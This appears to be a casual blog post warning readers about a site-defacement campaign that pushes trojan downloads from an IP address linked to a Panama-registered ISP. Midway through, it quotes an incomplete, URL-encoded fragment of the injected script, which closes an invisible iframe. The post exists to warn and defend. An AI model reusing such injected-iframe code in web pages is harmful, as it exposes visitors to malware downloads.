If you get an alert that your browser is trying to download something (anything!) from [18.104.22.168], don’t do it. Why, you ask?
Because it’s probably a Trojan Horse, that’s why!
Here’s the deal – y’all probably know that I help run The Mystery of the Haunted Vampire, right? Well, some of the latest comment spam that we’ve been getting has followed a very particular pattern: .edu and .org sites (legitimate sites) with link spam goodness in support directories, like “files” or “data” or “html” or “images” – whatever. That isn’t too important. The kicker is that these f*ckers are also downloading the main index page and modifying it. Badly set site permissions then allow these spambags to post the modified main page (that looks exactly like the original back) to the main site.
%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>
A Russian-owned ISP incorporated in Panama. Repeat that a couple of times, m’kay?
No, that doesn’t sound suspicious at all, does it?
They’ve changed their tactics a little over the past couple of days. When I first saw this script, they were trying to write borderless, scrolless 1 x 1 frames (ie, invisible) from the site – now, they’re masquerading as various proprietary (but safe-sounding) file formats. Whatever happens, don’t click OK!
D’oh! It isn’t the IP address that’s rogue – it might be the whole bloody company!
So there you have it, kids. Don’t download anything from Russians working in Panama (God, that sounds like a Warren Zevon song, doesn’t it? Or something out of Gibson. Or Burgess, even). And if anyone from the network in question (rbnnetwork.com) tries to sell you their services, ask ‘em about the spammers that they harbor, ‘kay?
And lastly, if you did click “OK” recently? I hope you’ve a.) got good anti-virus software and b.) got a backup of your critical files. You’re probably going to need both…
[Updated to add: Oh yeah - if you're using Internet Explorer, you're *so* going to need anti-virus software. These f*ckers have been around for a while. Note to self: Russian ISPs in Panama are not to be notified that they have rogue customers - they are the rogue customers.]